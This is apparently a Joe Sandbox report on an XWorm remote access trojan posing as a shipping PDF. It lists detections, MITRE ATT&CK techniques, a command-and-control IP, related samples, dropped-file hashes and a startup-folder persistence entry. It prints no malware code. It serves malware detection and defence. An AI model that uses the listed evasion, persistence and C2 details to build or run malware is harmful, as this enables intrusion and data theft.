Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4530484778.0000000001074000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534290807.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 6608, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4534290807.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 6608, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	2 Registry Run Keys / Startup Folder	11 Process Injection	11 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	18%	ReversingLabs	Win32.Trojan.Generic
F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	29%	Virustotal		Browse
F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	16%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\XClient.exe	29%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
104.250.180.178	16%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
104.250.180.178	true	16%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2143073339.0000000005327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2178946361.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2221393988.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000C.00000002.2267205471.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2138530136.0000000004416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.2138530136.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000007.00000002.2186717140.0000000008582000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000C.00000002.2267205471.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://go.micro	powershell.exe, 00000009.00000002.2204031498.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.000000000550F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.miE	powershell.exe, 00000007.00000002.2183561020.00000000075C2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2138530136.0000000004416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2143073339.0000000005327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2178946361.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2221393988.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microz	powershell.exe, 00000007.00000002.2164444713.000000000307B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4534290807.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2138530136.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000C.00000002.2267205471.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://crl.mi	powershell.exe, 00000009.00000002.2230293062.0000000007739000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micros	powershell.exe, 00000004.00000002.2145777627.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.250.180.178	unknown	United States		9009	M247GB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528881
Start date and time:	2024-10-08 11:27:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/21@0/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 471 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2848 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4592 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:28:15	API Interceptor	8854639x Sleep call for process: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe modified
05:28:20	API Interceptor	40x Sleep call for process: powershell.exe modified
11:28:39	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.250.180.178	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse
	6122.scr.exe	Get hash	malicious	Remcos	Browse
	6122.scr.exe	Get hash	malicious	Remcos	Browse
	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse
	BNE400266900B - RLS SO# W317pdf.scr.exe	Get hash	malicious	Remcos	Browse
	BNE400266900A - BL NO.BNE400266900.pdf.scr.exe	Get hash	malicious	XWorm	Browse
	(Draft) - SO# L539-SE2409060 Cut off #Uff19-15 - CHR# 487700191.scr.exe	Get hash	malicious	Remcos	Browse
	SEA - SO#L539 (SO+INV+PKG+ISF+VGM).scr.exe	Get hash	malicious	XWorm	Browse
	rSO3315RCOHBLKHRTMP249013CO240913.pdf.scr.exe	Get hash	malicious	Remcos	Browse
	rBLNO.KHRTMP249013-SINGAPOREEXPRESSV.002W.scr.exe	Get hash	malicious	XWorm	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	na.elf	Get hash	malicious	Mirai	Browse	38.206.34.62
	PO# EB202329720241007_Hardy_Process^^^^.pif.exe	Get hash	malicious	Unknown	Browse	89.238.176.5
	NEW INVOICE.exe	Get hash	malicious	FormBook	Browse	45.150.55.15
	Quotation request YN2024-10-07pdf.vbs	Get hash	malicious	Remcos	Browse	172.111.244.100
	Urgent Purchase Order (P.O.) No.477764107102024.vbs	Get hash	malicious	Remcos	Browse	172.111.244.100
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	38.206.46.29
	17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe	Get hash	malicious	Remcos	Browse	185.236.203.101
	na.rtf	Get hash	malicious	Remcos	Browse	185.236.203.101
	file.dll	Get hash	malicious	Matanbuchus	Browse	193.109.85.31
	file.dll	Get hash	malicious	Matanbuchus	Browse	193.109.85.31

Process:	C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379540626579189
Encrypted:	false
SSDEEP:	48:NlWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeovUyus:NlLHyIFKL3IZ2KRH9OugYs
MD5:	352C703F279BAC9E349C458DA3194776
SHA1:	6C28749AB71228B9F305A1EC56534A1D1842C397
SHA-256:	04F3E4DF339CF918CAFD661E304CF1524357A716C140A24EC361E747BAD9224D
SHA-512:	5F801E77DF45E44C9D672AC2AAA188B5C3B4CDAD178B8B6EF7414040335DA2A6553A2E6AA57082C9B27E224AD35002076D90D9C4CB010765DB8AB72F964DA27B
Malicious:	false
Reputation:	low
Preview:	@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ltnvgwb.qz5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gqqqfti.wmj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g3v2mv4.c3k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sqmsmr1.3rv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_doo1jfqc.i2f.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5dziafv.dvh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwix4mu4.0r2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

